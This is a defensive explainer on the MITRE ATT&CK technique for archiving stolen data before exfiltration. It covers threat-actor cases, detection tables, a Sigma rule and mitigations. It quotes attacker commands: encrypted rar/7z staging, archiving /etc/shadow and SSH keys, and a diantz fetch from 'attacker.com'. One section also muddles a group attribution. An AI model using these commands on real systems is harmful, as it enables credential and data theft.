MITRE ATT&CK T1560: Archive Collected Data

T1560 — Archive Collected Data — describes the adversary behavior of compressing and/or encrypting data that has already been collected on a victim system, in preparation for exfiltration. It sits within the Collection tactic and nearly always precedes a T1041 or T1048 exfiltration step.

The logic is straightforward: raw files are large, structurally identifiable, and potentially inspectable by data loss prevention (DLP) tooling or network proxies. A password-protected RAR archive is none of those things. It blends in with normal file transfers, resists content inspection, and reduces the volume of data that needs to move across the wire — which in turn lowers the chance of triggering bandwidth anomaly alerts.

why this technique persists

MITRE notes this technique cannot be easily mitigated with preventive controls because it abuses legitimate system features. Standard archiving and encryption utilities exist on almost every operating system. The same command a sysadmin uses to back up a directory is the same command an attacker uses to pack up stolen credentials.

The Three Sub-Techniques

T1560 has three sub-techniques, each reflecting a different method an attacker might use to accomplish the same goal.

T1560.001

Archive via Utility

Standalone tools: 7-Zip, WinRAR, WinZip, tar, gzip, bzip2, diantz/makecab (Windows cabinet files), certutil for Base64 encoding. These are pre-installed on many systems or dropped by the attacker.

T1560.002

Archive via Library

Archival libraries called from within malware — rarfile, libzip, zlib — without invoking a separate subprocess. No child process is created; compression happens inside the implant itself. Harder to detect.

T1560.003

Archive via Custom Method

Hand-rolled encryption or compression: XOR ciphers, stream ciphers, custom implementations of known algorithms. No external library reference means no behavioral signature to match. Used by nation-state implants.

Where T1560 Fits in the Kill Chain

T1560 does not happen in isolation. In a typical intrusion it occupies a very specific position — after collection is complete and before data actually leaves the network. Because archiving almost always precedes exfiltration, a detection event at this stage represents a last-chance opportunity to intervene before data leaves the organization.

Initial Access

Persistence & Lateral Movement

Collection T1074 / T1005

Archive T1560 ← here

Exfiltration T1041

The presence of T1560 activity on a system that has experienced prior suspicious behavior should be treated as a high-confidence indicator of an active, advanced intrusion — not a false positive to tune out.

Tools, Commands, and Common Patterns

The following examples represent commands that have appeared in real threat actor toolkits and incident response investigations.

WinRAR — The Most Commonly Observed Utility

WinRAR remains the archiving tool seen most frequently in APT and ransomware investigations. Attackers either bring their own copy of rar.exe or rely on an existing installation.

# Archive with AES-256 encryption and password, max compression
rar.exe a -dh -hp[PASSWORD] -m5 C:\ProgramData\staging\1.rar C:\ProgramData\staging\data.txt

# Multi-volume archive split into 50MB chunks for staged exfiltration
rar.exe a -v50m -hp[PASSWORD] -r output.rar C:\Users\

# Seen in APT28 campaigns: target specific file types recursively
rar.exe a -hp[PASSWORD] -n*.doc -n*.docx -n*.pdf -n*.xls exfil.rar C:\

header encryption flag

The -hp flag in WinRAR (and -mhe in 7-Zip) enables header encryption, which hides filenames inside the archive — not just file contents. This defeats metadata-level content inspection tools. Its presence outside of known backup workflows is a meaningful indicator of malicious intent.

7-Zip

7-Zip is widely used due to its open-source availability and strong AES-256 encryption. FIN7 infrastructure exposed in 2023 included native 7-Zip binaries alongside OpenSSH tools used to establish reverse tunnels for data routing.

# Password-protected 7z archive with header encryption
7z.exe a -p[PASSWORD] -mhe=on archive.7z C:\Users\target\Documents\

# Maximum compression, encrypted headers (hides all filenames)
7z.exe a -t7z -mx=9 -mhe -p[PASSWORD] out.7z .\collected\

Windows Built-in: diantz / makecab

diantz.exe is a LOLBin natively present on Windows. It creates cabinet (.cab) files and can fetch files from remote locations before compressing them — combining collection and archiving in a single step. MITRE documents this specifically for its overlap with Remote Data Staging.

# Create a cabinet file from a local file
diantz.exe targetfile.txt output.cab

# Download and compress remotely in one step
diantz.exe /F http://attacker.com/directives.ddf

certutil — Base64 Encoding as Obfuscation

certutil is frequently used to Base64-encode collected data before transfer, ensuring it passes as plain text through content filters. It requires no additional tools and leaves minimal artifact outside of process creation logs.

certutil -encode C:\staged\dump.bin C:\staged\dump.b64

Linux and macOS: tar + openssl Pipeline

On Unix-like systems, attackers chain standard utilities. Context — parent process, invocation path, output directory, timing — is what separates legitimate use from malicious staging.

# Compress and encrypt in one pipeline — common in server compromises
tar -czf - /home/target/ | openssl enc -aes-256-cbc -salt -pass pass:[PASSWORD] > /tmp/.cache/out.enc

# Seen in OceanLotus (APT32) Linux server targeting
tar -zcvf /tmp/.x/results.tar.gz /etc/passwd /etc/shadow /root/.ssh/

Confirmed Threat Actor Incidents

T1560 appears in the documented TTP profiles of dozens of confirmed threat groups and has been identified as a contributing factor in some of the most consequential breaches in history. The following incidents are drawn from public indictments, government advisories, and vendor threat intelligence reports.

GRU / APT28 (Fancy Bear) — DNC Hack & 2016 U.S. Election Operation

Nation-State Russian GRU

The 2018 Mueller indictment of twelve GRU Unit 26165 officers (United States v. Netyksho et al.) provides one of the most detailed public records of T1560 in nation-state use. After gaining access to the DNC and DCCC networks in 2016, APT28 operators used X-Agent to collect emails, documents, and credentials, then staged and compressed the data before exfiltrating it through encrypted channels via their X-Tunnel implant. Stolen files were packaged and shipped to GRU-controlled infrastructure in Arizona before being distributed through DCLeaks and WikiLeaks.

In 2023, Google's TAG observed APT28 exploiting the WinRAR CVE-2023-38831 zero-day in campaigns against Ukrainian entities — using malicious RAR archives as both a delivery mechanism and a data staging tool in the same operation, demonstrating how archiving utilities serve dual offensive roles.

Lazarus Group (Hidden Cobra) — Sony Pictures, 2014, and Ongoing Campaigns

Nation-State DPRK

North Korea's Lazarus Group conducted one of the most destructive corporate intrusions on record against Sony Pictures Entertainment. Before deploying wiper malware, operators collected and staged massive volumes of data — unreleased films, executive emails, employee SSNs, salary records — all packaged before transmission. Lazarus's IndiaIndia malware writes harvested victim data to %TEMP%, then compresses and encrypts the file before uploading to a C2 server — T1560 baked directly into the binary.

Across years of campaigns, Lazarus consistently stages collected files and credential caches locally before exfiltration, minimizing C2 connection volume and reducing detection opportunities. RAR archives are a documented standard staging tool across Lazarus campaigns from 2014 through their 2024–2025 cryptocurrency exchange operations, including the $1.5 billion Bybit theft in February 2025.

APT41 (Double Dragon) — DUSTTRAP Campaign, 2023–2024

Nation-State Chinese MSS

Mandiant's 2024 DUSTTRAP report documented APT41 hitting organizations across shipping, logistics, media, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the UK, with persistent access maintained since at least 2023. APT41 used SQLULDR2 to export Oracle database contents and PINEGROVE to package and exfiltrate large data volumes to Microsoft OneDrive — using cloud storage to blend encrypted archives into legitimate traffic.

The group also leveraged certutil.exe to download their DUSTPAN dropper — the same Windows binary used elsewhere in T1560.001 operations to Base64-encode staged data — demonstrating consistent dual-use of LOLBins across both delivery and archiving phases of the same intrusion.

Black Basta Ransomware (FIN7-Linked) — Enterprise & Critical Infrastructure, 2022–2024

Ransomware FIN7-Linked

Black Basta emerged in April 2022 and claimed over 90 victims within six months. SentinelOne research established strong links to FIN7 (Carbanak) through shared custom tooling and overlapping infrastructure. The group's double-extortion model requires data to be stolen and compressed before encryption, ensuring leverage even if victims restore from backups. WinRAR was used to package harvested credentials and internal documents, with SystemBC SOCKS5 proxy routing archives through proxied connections to reduce attribution surface.

FIN7's own staging infrastructure, exposed during investigation of their Diceloader C2, contained native 7-Zip binaries alongside OpenSSH tools — combined to compress collected data and route it through reverse SSH tunnels configured as scheduled tasks for persistence across reboots. A representative observed command: rar.exe a -dh -hp[PASSWORD] -m5 C:\ProgramData\1.rar C:\ProgramData\1.txt

Turla (Snake / Uroburos) — FSB-Linked Long-Running Espionage

Nation-State Russian FSB

Russia's FSB-linked Turla group is among the earliest documented practitioners of T1560.003 at scale. Kaspersky's Epic Turla analysis documented custom compression and encryption baked into their implant toolchain — handling archiving internally rather than invoking external utilities. Turla's LightNeuron email implant, analyzed by ESET in 2019, used custom encryption when archiving stolen email content: no child process, no command-line flag, no event log entry tied to an archiving tool. A 2023 report on Turla TTPs confirmed their ongoing preference for splitting archives into small segments to evade size-based anomaly detection on outbound flows.

OceanLotus / APT32 — Southeast Asian Government Targeting

Nation-State Vietnamese

ESET's 2019 research on OceanLotus decoys documented the group using zip and tar archives to package collected data from Linux-based government servers before tunneling it through encrypted channels. A 2023 Palo Alto Unit 42 report on cyberespionage against Southeast Asian government entities linked to Stately Taurus (Mustang Panda) showed operators using command-line archive tools to create password-protected archives in temp directories before HTTPS exfiltration — a pattern consistent across multiple Vietnamese-attributed campaigns over several years.

Dragonfly / Berserk Bear — Energy Sector Critical Infrastructure

Nation-State Russian GRU/FSB

Symantec's Dragonfly documentation and the 2018 US-CERT advisory TA18-074A on Russian government cyber activity targeting critical infrastructure both explicitly called out archiving and encryption as a pre-exfiltration step. Operators collected configuration files, credentials, and engineering diagrams from energy companies in the United States, Europe, and Turkey and compressed them before exfiltration. In an ICS context, engineering schematics and control system configurations compressed into a single encrypted archive represent a near-complete blueprint for a future disruptive attack — making T1560 detection especially high-stakes in OT environments.

Winnti Group (Operation CuckooBees) — Decade-Long IP Theft from Pharma & Tech

Nation-State Chinese

Cybereason's 2022 analysis of Operation CuckooBees revealed a decade-long intrusion attributed to the Winnti Group targeting pharmaceutical and technology firms for IP. The operators used custom loaders and stealthy compression techniques that avoided spawning child processes — consistent with T1560.002 — to bundle collected source code, documents, and manufacturing blueprints before staging. The campaign's extraordinary longevity demonstrates that library-based archiving inside a malware implant can extend dwell time for years without triggering standard detection logic tuned to child process creation.

Play Ransomware — CISA Advisory AA23-352A

Ransomware

CISA's December 2023 advisory AA23-352A on Play Ransomware explicitly documented T1560 as a confirmed technique, with WinRAR used consistently for data staging prior to exfiltration. Trend Micro's July 2023 Ransomware Spotlight confirmed archives are created in staging directories — frequently C:\ProgramData\ or user temp paths — before transfer. Play targeted critical infrastructure, healthcare, and government entities with a double-extortion model requiring this pre-encryption data packaging step.

Kimsuky (APT43) — Operation Muzabi & Troll Stealer, 2023–2024

Nation-State DPRK

KISA's Operation Muzabi analysis (referenced in MITRE's T1560 documentation) documented Kimsuky operators using archiving as part of phishing-to-exfiltration chains targeting South Korean entities. A 2024 S2W report on Troll Stealer — a Kimsuky-attributed implant signed with a valid certificate — showed it collecting and compressing SSH key material, browser data, and documents into encrypted archives before C2 delivery. Kimsuky's use of T1560 is consistent across implant generations: from early GoldDragon malware through Troll Stealer in 2024, the collect-compress-exfiltrate sequence has remained a constant in every documented campaign.

Detection Guidance

MITRE ATT&CK v18 added a formal detection strategy for T1560 (DET0526, created October 2025), targeting three primary surfaces: process execution, file creation patterns, and process lineage anomalies.

Data Source	What to Look For	Notes
Process Creation	Execution of `rar.exe`, `7z.exe`, `makecab.exe`, `diantz.exe`, `tar`, `gzip`, `bzip2`, `openssl enc` with compression or encryption switches	Flag especially when invoked by non-standard parent processes: Office apps, IIS workers, web shells, scheduled tasks on servers
File Creation	Large files with extensions `.rar`, `.zip`, `.7z`, `.cab`, `.tar.gz`, `.enc` appearing in `C:\ProgramData\`, `%TEMP%`, `/tmp`, `/var/tmp`	Correlate with process execution events. A .rar created by a process other than a user shell or known backup agent warrants investigation.
Command-Line Args	Password flags: `-hp` (WinRAR header encryption), `-p` (7-Zip), `-pass` (openssl). Recursive: `-r`. Delete after archive: `-df` in WinRAR.	Header encryption hides filenames. Outside known backup workflows, its use is a strong malicious indicator.
Process Lineage	Archiving tools launched from scheduled tasks, services, web shells, or unexpected parent binaries. Abnormal `crypt32.dll` usage.	IIS worker spawning `rar.exe` is essentially never legitimate. A scheduled task invoking `7z.exe` on a DC warrants immediate investigation.
PowerShell	`Compress-Archive` cmdlet invocations in unusual directories or from unexpected processes	Enable Script Block Logging (Event ID 4104). Transcription logging adds coverage for .NET compression calls bypassing Compress-Archive.
Network Traffic	Outbound transfers of large files with archive magic bytes following process execution from the categories above	Correlate with DLP events. Encrypted archive headers are identifiable without decrypting content. Flag transfers to cloud storage or unknown ASNs.

Sigma Detection Rule (T1560.001 — Windows)

title: Archive Utility With Encryption Flag in Suspicious Context
id: T1560-001-archive-encryption
status: experimental
description: Detects password-protected archive creation by rar.exe or 7z.exe
          launched from anomalous parent processes
logsource:
    category: process_creation
    product: windows
detection:
    selection_tools:
        Image|endswith:
            - '\rar.exe'
            - '\7z.exe'
            - '\winrar.exe'
    selection_encrypt:
        CommandLine|contains:
            - ' -hp'
            - ' -p '
            - ' -mhe'
    filter_legit_parent:
        ParentImage|contains:
            - 'Explorer.exe'
            - 'cmd.exe'
    condition: selection_tools and selection_encrypt and not filter_legit_parent
falsepositives:
    - Legitimate backup scripts (baseline and suppress known-good)
    - Developers compressing release artifacts
level: high
tags:
    - attack.collection
    - attack.t1560.001

T1560.002 and T1560.003 require different approaches

Library-based and custom-method archiving produce no child process artifacts and no command-line flags to capture. Detection here shifts to memory analysis, behavioral anomalies in post-collection network traffic volume, and file entropy monitoring. Files with abnormally high entropy (approaching 8.0) appearing in staging paths and subsequently transiting the network are a reasonable behavioral indicator. EDR with memory scanning may detect malicious compression routines embedded in implant code.

Mitigations and Hardening

MITRE's formal position is that T1560 cannot be easily mitigated through preventive controls because it abuses legitimate functionality. Defenders have meaningful options at the detection, visibility, and response layers.

Application control and allowlisting. Where users have no legitimate need to run rar.exe, 7z.exe, or equivalent tools, AppLocker or WDAC policies can block execution outside approved paths. This forces attackers to use LOLBins or switch to library-based archiving — both detectable by different means.
Full-coverage EDR. Ensure EDR is deployed with complete telemetry on process creation, command-line capture, and file write events. Threat actors routinely survey for unprotected hosts before initiating collection operations — gaps in EDR coverage are exploited deliberately.
DLP tuning for archive patterns. While encrypted archives resist content inspection, DLP can still trigger on file size thresholds, destination reputation, and outbound data volume. Flagging large encrypted transfers to cloud storage or unknown IP ranges provides a compensating control independent of endpoint telemetry.
PowerShell Script Block Logging. Enable Event ID 4104 and forward logs to your SIEM. Compress-Archive and ConvertTo-SecureString in unusual contexts are detectable here. Transcription logging adds coverage for direct .NET compression calls.
Egress filtering and network segmentation. T1560 precedes exfiltration. If data can be archived but cannot leave the network, the objective is frustrated. Strict egress filtering — blocking direct outbound connections from server infrastructure to consumer cloud services and uncommon destination ASNs — addresses the downstream step that T1560 enables.

Technique	Relationship to T1560
T1005 — Data from Local System	Collection phase preceding T1560. Operators search local drives, profile directories, and application data stores before staging.
T1039 — Data from Network Shared Drive	Collection from SMB shares or mapped drives. Often followed immediately by T1560 to package everything before transfer.
T1074 — Data Staged	Closely related: data is placed in a temporary location before or after archiving. T1560 and T1074 frequently appear together in the same intrusion timeline.
T1041 — Exfiltration Over C2 Channel	The step following T1560. Detection of T1041 without a corresponding T1560 event may indicate library-based archiving was used, or raw files were sent directly.
T1048 — Exfiltration Over Alternative Protocol	Attackers may exfiltrate archives via DNS, ICMP, or web services. The archive format is the same; the carrier changes.
T1027 — Obfuscated Files or Information	Overlaps conceptually with archive encryption. The distinction is intent: T1560 is about packaging stolen data; T1027 is about hiding malicious code or commands.

Key Takeaways

T1560 is a last-chance detection opportunity. By the time archiving begins, collection is complete. A detection here can stop an exfiltration that survived every earlier control in the kill chain.
The tools are legitimate — context is everything. WinRAR and 7-Zip are not inherently malicious. Parent process, invocation path, output directory, and timing are what turn a routine tool into an indicator of compromise.
Header encryption is a strong signal. The -hp and -mhe flags hide filenames inside archives. Outside of known backup workflows, their presence is a meaningful indicator of malicious intent.
Library-based archiving (T1560.002) is detection-resistant by design. Nation-state implants like Turla's LightNeuron and Winnti's CuckooBees loaders handle compression internally — no child process, no command-line flag, no standard detection trigger. Memory scanning and file entropy analysis are needed here.
This pattern is universal across actor types. From GRU election interference to North Korean financial crime to ransomware double-extortion, the collect-compress-exfiltrate sequence is a near-constant. If you see it on a host with prior suspicious activity, treat it as a high-confidence signal of an active advanced intrusion.

sources

MITRE ATT&CK T1560 and sub-technique pages (v18, 2025) • Mueller Indictment — United States v. Netyksho (2018) • Mandiant APT41 / DUSTTRAP report (2024) • SentinelOne Black Basta / FIN7 analysis (2022, 2023) • CISA AA23-352A Play Ransomware Advisory (2023) • Picus Security Lazarus and APT41 TTP analyses • Cybereason Operation CuckooBees (2022) • ESET LightNeuron / Turla research (2019) • Cisco Talos Salt Typhoon report (2025) • KISA Operation Muzabi / S2W Troll Stealer (2024) • Google TAG WinRAR CVE-2023-38831 advisory (2023)